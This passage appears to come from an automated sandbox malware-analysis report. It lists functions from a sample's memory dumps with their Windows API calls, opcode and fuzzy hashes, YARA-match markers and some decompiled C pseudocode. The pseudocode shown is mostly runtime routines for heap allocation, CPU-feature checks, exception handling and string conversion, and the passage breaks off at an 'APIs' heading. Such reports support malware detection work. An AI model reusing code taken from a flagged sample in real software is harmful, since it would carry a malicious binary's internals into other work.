                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 886c1f5a4cdf673e2914c91f68d1e0c5a19048aef05564f65a72eb1878403e25
                • Instruction ID: 0ac8be198791fe440e120418afaadbf82597a7196347567491a6b9cea7bf251f
                • Opcode Fuzzy Hash: 886c1f5a4cdf673e2914c91f68d1e0c5a19048aef05564f65a72eb1878403e25
                • Instruction Fuzzy Hash: 9721E3B59052599FDB10CFA9D884AEEFFF4EB48314F14841AE958A7310C378AA45CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0225BD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0225BD87
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: baec86fb90106dca584f6fd9af2170a57a6204af61f0c0a0120c59024d65eee1
                • Instruction ID: f950517c5ba22e76000107d895b2610037b1aad8a175448fb082468a169c3824
                • Opcode Fuzzy Hash: baec86fb90106dca584f6fd9af2170a57a6204af61f0c0a0120c59024d65eee1
                • Instruction Fuzzy Hash: CC21C4B59002599FDB10CFAAD984ADEFBF4EB48314F14841AE918B7310D374A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02259849, Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022596A9,00000800,00000000,00000000), ref: 022598BA
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 3906c6e973f813dc742040c0475aa095405cdfa2f30f0b09ee22debd160bb663
                • Instruction ID: a6aac423e726937c15a0b29802bb70316490707372169f25941da48d9f0d8183
                • Opcode Fuzzy Hash: 3906c6e973f813dc742040c0475aa095405cdfa2f30f0b09ee22debd160bb663
                • Instruction Fuzzy Hash: E12106B2D042598FDB10CFAAC448ADEFBF4EB48314F15842ED929BB200C378A545CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02258768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022596A9,00000800,00000000,00000000), ref: 022598BA
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: f506300af95bbecd34dae9c4ec776a8753e0adc69192ee7467386c2ae6bfc46d
                • Instruction ID: 2fb9bda74aafed39404f29a84cf6da3c2176ec9b534a0d44704acc6335cfc97f
                • Opcode Fuzzy Hash: f506300af95bbecd34dae9c4ec776a8753e0adc69192ee7467386c2ae6bfc46d
                • Instruction Fuzzy Hash: 4D11F2B69042499FCB10CF9AC448ADEFBF4AB48314F14842EE929B7604C379A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02257EEA, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                Download Yara Rule
                APIs
                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02257F5D
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: CallbackDispatcherUser
                • String ID:
                • API String ID: 2492992576-0
                • Opcode ID: f0e1fa45a1a8f1ac7b6d301fdc457c8e60ea73240bef48380f11b97a464dd039
                • Instruction ID: 0c68689b2f4807085aeffb4b24d0adb1a48bca432d4f45b0d85fcc50d6b898a7
                • Opcode Fuzzy Hash: f0e1fa45a1a8f1ac7b6d301fdc457c8e60ea73240bef48380f11b97a464dd039
                • Instruction Fuzzy Hash: 7921AF718097998FDB11CFA5D8043EFFFF4AB06314F14849AD895B7282C7789606CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 022595C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 0225962E
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 8b7b97d9dfa152cbaa4486e247882afb064a66431650566206795637b70bfcda
                • Instruction ID: a4130a866b2edab0d437f87ac3b292caaefc6dfcd9c0d693d6adc0d8e77aa87b
                • Opcode Fuzzy Hash: 8b7b97d9dfa152cbaa4486e247882afb064a66431650566206795637b70bfcda
                • Instruction Fuzzy Hash: 9511E0B5D00699CFCB10CF9AC444BDEFBF4AB89214F14C52AD829B7604D375A54ACFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0225FE38, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • SetWindowLongW.USER32(?,?,?), ref: 0225FE9D
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: 287c456564ca7821b7a5f00b121f154e9b87d459a2ead8a4a0608c0859834914
                • Instruction ID: f06cdbf5500c37e3c36d2f2a5d0f441dddbe6bfd3ad3243b5bc4bc2b709e9e0b
                • Opcode Fuzzy Hash: 287c456564ca7821b7a5f00b121f154e9b87d459a2ead8a4a0608c0859834914
                • Instruction Fuzzy Hash: C91133B19003498FDB10CF99D589BDEFBF4EB49324F10845AE819A7701C374AA45CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0225FE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                Download Yara Rule
                APIs
                • SetWindowLongW.USER32(?,?,?), ref: 0225FE9D
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: e2b6a48035fb87ce82fe15b8e9810b92e3a0abf34e477a73bd1e6cb4e8529218
                • Instruction ID: 9014411bbf7e21a1914d4a52db10ad8ef04dfe9f8ba19b1adab70ee51b844ce2
                • Opcode Fuzzy Hash: e2b6a48035fb87ce82fe15b8e9810b92e3a0abf34e477a73bd1e6cb4e8529218
                • Instruction Fuzzy Hash: E81100B59002498FDB10CF9AD585BDFFBF8EB48324F20841AE818A7700C374A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                0x00403e3d
                0x00403e43
                0x00403e49
                0x00403e7b
                0x00403e80
                0x00403e86
                0x00000000
                0x00403e86
                0x00403e4d
                0x00403e4f
                0x00403e4f
                0x00403e66
                0x00403e6f
                0x00403e77
                0x00000000
                0x00000000
                0x00403e57
                0x00403e59
                0x00000000
                0x00000000
                0x00403e5c
                0x00403e61
                0x00403e62
                0x00403e64
                0x00000000
                0x00000000
                0x00403e64
                0x00000000

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0061D1D4, Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.486793651.000000000061D000.00000040.00000001.sdmp, Offset: 0061D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 36d542a973339ab2687f5cb17cd84cea4f142bcfc2b83053e1972f62da3be66a
                • Instruction ID: 866c985d20ec7b67a4cc2fc154f4f4570e00832b5646b12146a2e5063aa40c34
                • Opcode Fuzzy Hash: 36d542a973339ab2687f5cb17cd84cea4f142bcfc2b83053e1972f62da3be66a
                • Instruction Fuzzy Hash: 19212970508244EFDB01CF14D9C0BAABBA6FB84314F38C66DEA094B356C336D986CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0061D01C, Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.486793651.000000000061D000.00000040.00000001.sdmp, Offset: 0061D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 196ac475abbbcacd6147c91b3fdea45e124b29b11a74ff3a0893c04002a973b0
                • Instruction ID: b3c06adc395a7a14c5cdb9faf2b1322df1564f9327719114d87b8b662d5e4862
                • Opcode Fuzzy Hash: 196ac475abbbcacd6147c91b3fdea45e124b29b11a74ff3a0893c04002a973b0
                • Instruction Fuzzy Hash: 5A21F575608244EFCB14CF14D8C0BAABB66FB88315F28C56DE9094B346C336D887CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0061D006, Relevance: .1, Instructions: 62COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.486793651.000000000061D000.00000040.00000001.sdmp, Offset: 0061D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1796907d7eb6b164800821065843d9a4ec7af556d4702eacd812f321748dffe5
                • Instruction ID: 2a64f76003013b792545ffc88a1a7fc993d96f6feaf22159e591a9cd290ffaa5
                • Opcode Fuzzy Hash: 1796907d7eb6b164800821065843d9a4ec7af556d4702eacd812f321748dffe5
                • Instruction Fuzzy Hash: A62180755093C09FCB02CF24D990755BF71EB46314F28C5DAD8498B6A7C33A984ACB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0061D1CF, Relevance: .1, Instructions: 53COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.486793651.000000000061D000.00000040.00000001.sdmp, Offset: 0061D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 782f9e41915746642c1b3bc8a08954d687731868874878b396c9b934aeaa4875
                • Instruction ID: 018bb7f46b7d5f0f7085a6720a87f488fe8acccadb1091ae1b5949318f44d7df
                • Opcode Fuzzy Hash: 782f9e41915746642c1b3bc8a08954d687731868874878b396c9b934aeaa4875
                • Instruction Fuzzy Hash: FB119D75904280DFCB11CF14D5C4B95FBA2FB84314F28C6AED9494B766C33AD94ACB61
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 0040446F, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				long _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t66;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t64 = __edx;
				_t59 = __ebx;
				_t40 =  *0x412014; // 0xf7147b27
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				_push(_t65);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00401E6A(_t41);
					_pop(_t60);
				}
				E00402460(_t65,  &_v804, 0, 0x50);
				E00402460(_t65,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t60;
				_v556 = _t64;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t65;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t66 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t57 = UnhandledExceptionFilter( &_v812);
				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00401E6A(_t57);
				}
				E004018CC();
				return _t57;
			}






































                0x0040446f
                0x0040446f
                0x0040446f
                0x0040447a
                0x0040447f
                0x00404481
                0x00404488
                0x00404489
                0x0040448b
                0x0040448e
                0x00404493
                0x00404493
                0x0040449f
                0x004044b2
                0x004044c0
                0x004044c6
                0x004044cc
                0x004044d2
                0x004044d8
                0x004044de
                0x004044e4
                0x004044ea
                0x004044f0
                0x004044f6
                0x004044fd
                0x00404504
                0x0040450b
                0x00404512
                0x00404519
                0x00404520
                0x00404521
                0x0040452a
                0x00404530
                0x00404533
                0x00404539
                0x00404546
                0x0040454f
                0x00404558
                0x00404561
                0x0040456f
                0x00404571
                0x0040457e
                0x00404586
                0x00404592
                0x00404595
                0x0040459a
                0x004045a1
                0x004045a9

                APIs
                • IsDebuggerPresent.KERNEL32 ref: 00404567
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
                • UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E
                Memory Dump Source
                • Source File: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: 2402715568fd3a7f033aea0833c586b82d8bbb398bbe1fad897268afcc2e17dd
                • Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
                • Opcode Fuzzy Hash: 2402715568fd3a7f033aea0833c586b82d8bbb398bbe1fad897268afcc2e17dd
                • Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040208D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E0040208D(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				signed int _t66;
				signed int _t68;
				intOrPtr _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				signed int _t91;
				signed int _t94;

				_t84 = __edx;
				 *0x412b2c =  *0x412b2c & 0x00000000;
				 *0x412030 =  *0x412030 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v24 = _v24 & 0x00000000;
				 *0x412030 =  *0x412030 | 0x00000002;
				 *0x412b2c = 1;
				_t86 =  &_v48;
				_push(1);
				asm("cpuid");
				_pop(_t73);
				 *_t86 = 0;
				 *((intOrPtr*)(_t86 + 4)) = 1;
				 *((intOrPtr*)(_t86 + 8)) = 0;
				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
				_v16 = _v48;
				_v8 = _v36 ^ 0x49656e69;
				_v12 = _v40 ^ 0x6c65746e;
				_push(1);
				asm("cpuid");
				_t75 =  &_v48;
				 *_t75 = 1;
				 *((intOrPtr*)(_t75 + 4)) = _t73;
				 *((intOrPtr*)(_t75 + 8)) = 0;
				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
					L9:
					_t91 =  *0x412b30; // 0x2
					L10:
					_v32 = _v36;
					_t59 = _v40;
					_v8 = _t59;
					_v28 = _t59;
					if(_v16 >= 7) {
						_t65 = 7;
						_push(_t75);
						asm("cpuid");
						_t77 =  &_v48;
						 *_t77 = _t65;
						 *((intOrPtr*)(_t77 + 4)) = _t75;
						 *((intOrPtr*)(_t77 + 8)) = 0;
						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
						_t66 = _v44;
						_v24 = _t66;
						_t59 = _v8;
						if((_t66 & 0x00000200) != 0) {
							 *0x412b30 = _t91 | 0x00000002;
						}
					}
					if((_t59 & 0x00100000) != 0) {
						 *0x412030 =  *0x412030 | 0x00000004;
						 *0x412b2c = 2;
						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
							asm("xgetbv");
							_v20 = _t59;
							_v16 = _t84;
							if((_v20 & 0x00000006) == 6 && 0 == 0) {
								_t62 =  *0x412030; // 0x2f
								_t63 = _t62 | 0x00000008;
								 *0x412b2c = 3;
								 *0x412030 = _t63;
								if((_v24 & 0x00000020) != 0) {
									 *0x412b2c = 5;
									 *0x412030 = _t63 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t68 = _v48 & 0x0fff3ff0;
				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
					_t94 =  *0x412b30; // 0x2
					_t91 = _t94 | 0x00000001;
					 *0x412b30 = _t91;
					goto L10;
				} else {
					goto L9;
				}
			}



























                0x0040208d
                0x00402090
                0x0040209e
                0x004020ad
                0x0040222a
                0x00402230
                0x00402230
                0x004020b3
                0x004020b9
                0x004020c4
                0x004020ca
                0x004020cd
                0x004020ce
                0x004020d2
                0x004020d3
                0x004020d5
                0x004020d8
                0x004020dd
                0x004020e6
                0x004020f7
                0x00402102
                0x00402108
                0x00402109
                0x00402111
                0x00402117
                0x00402119
                0x0040211c
                0x0040211f
                0x00402122
                0x00402167
                0x00402167
                0x0040216d
                0x00402174
                0x00402177
                0x0040217a
                0x0040217d
                0x00402180
                0x00402184
                0x00402187
                0x00402188
                0x0040218d
                0x00402190
                0x00402192
                0x00402195
                0x00402198
                0x0040219b
                0x004021a3
                0x004021a6
                0x004021a9
                0x004021ae
                0x004021ae
                0x004021a9
                0x004021bb
                0x004021bd
                0x004021c4
                0x004021d3
                0x004021de
                0x004021e1
                0x004021e4
                0x004021f5
                0x004021fb
                0x00402200
                0x00402203
                0x00402211
                0x00402216
                0x0040221b
                0x00402225
                0x00402225
                0x00402216
                0x004021f5
                0x004021d3
                0x00000000
                0x004021bb
                0x00402127
                0x00402131
                0x00402156
                0x0040215c
                0x0040215f
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004020A6
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: FeaturePresentProcessor
                • String ID:
                • API String ID: 2325560087-3916222277
                • Opcode ID: 81a6643d8d766bf2a1e14be1042f56af57549ae9e9951545f306693b5f2864aa
                • Instruction ID: 00a0b3a4e6e1703bd72bf57860e68eebd2cbb95fa7def28fde3004e4e54fdf29
                • Opcode Fuzzy Hash: 81a6643d8d766bf2a1e14be1042f56af57549ae9e9951545f306693b5f2864aa
                • Instruction Fuzzy Hash: 02515AB19102099BDB15CFA9DA8979ABBF4FB08314F14C57AD804EB390D3B8A915CF58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004067FE, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004067FE() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x4132b0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                0x004067fe
                0x00406806
                0x0040680e

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                • Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
                • Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                • Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                Download Yara Rule
                C-Code - Quality: 70%
                			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0xf7147b27
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080DB(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                0x004078d4
                0x004078d5
                0x004078d6
                0x004078dd
                0x004078e2
                0x004078e8
                0x004078ee
                0x004078f4
                0x004078f7
                0x004078f7
                0x004078fa
                0x004078fc
                0x004078fc
                0x004078fa
                0x004078fe
                0x00407903
                0x0040790a
                0x0040790d
                0x0040790d
                0x00407929
                0x0040792f
                0x00407934
                0x00407ac7
                0x00407ad2
                0x00407ada
                0x0040793a
                0x0040793a
                0x0040793d
                0x00407942
                0x00407946
                0x0040799a
                0x0040799a
                0x0040799c
                0x0040799e
                0x00407abc
                0x00407abc
                0x00407abe
                0x00407abf
                0x00407ac5
                0x00000000
                0x00407ac5
                0x004079af
                0x004079b5
                0x004079b7
                0x00000000
                0x00000000
                0x004079bd
                0x004079cf
                0x004079d4
                0x004079d8
                0x00000000
                0x00000000
                0x004079e5
                0x00407a1f
                0x00407a22
                0x00407a25
                0x00407a27
                0x00407a29
                0x00407a2b
                0x00407a77
                0x00407a77
                0x00407a79
                0x00407a79
                0x00407a7b
                0x00407ab5
                0x00407ab6
                0x00000000
                0x00407abb
                0x00407a8f
                0x00407a94
                0x00407a96
                0x00000000
                0x00000000
                0x00407a9a
                0x00407a9b
                0x00407a9c
                0x00407a9f
                0x00407adb
                0x00407ade
                0x00407aa1
                0x00407aa1
                0x00407aa2
                0x00407aa2
                0x00407aaf
                0x00407ab1
                0x00407ab3
                0x00407ae4
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00407ab3
                0x00407a2d
                0x00407a30
                0x00407a32
                0x00407a34
                0x00407a36
                0x00407a39
                0x00407a3e
                0x00407a59
                0x00407a5b
                0x00407a65
                0x00407a67
                0x00407a68
                0x00407a6a
                0x00000000
                0x00000000
                0x00407a6c
                0x00407a72
                0x00407a72
                0x00000000
                0x00407a72
                0x00407a40
                0x00407a42
                0x00407a46
                0x00407a4b
                0x00407a4d
                0x00407a4f
                0x00000000
                0x00000000
                0x00407a51
                0x00000000
                0x00407a51
                0x004079e7
                0x004079ec
                0x00000000
                0x00000000
                0x004079f2
                0x004079f4
                0x00000000
                0x00000000
                0x00407a10
                0x00407a14
                0x00000000
                0x00000000
                0x00000000
                0x00407a1a
                0x0040794d
                0x0040794f
                0x00407951
                0x00407959
                0x00407978
                0x0040797a
                0x00407984
                0x00407986
                0x00407987
                0x00407989
                0x00000000
                0x00000000
                0x0040798f
                0x00407995
                0x00407995
                0x00000000
                0x00407995
                0x0040795d
                0x00407961
                0x00407966
                0x0040796a
                0x00000000
                0x00000000
                0x00407970
                0x00000000
                0x00407970

                APIs
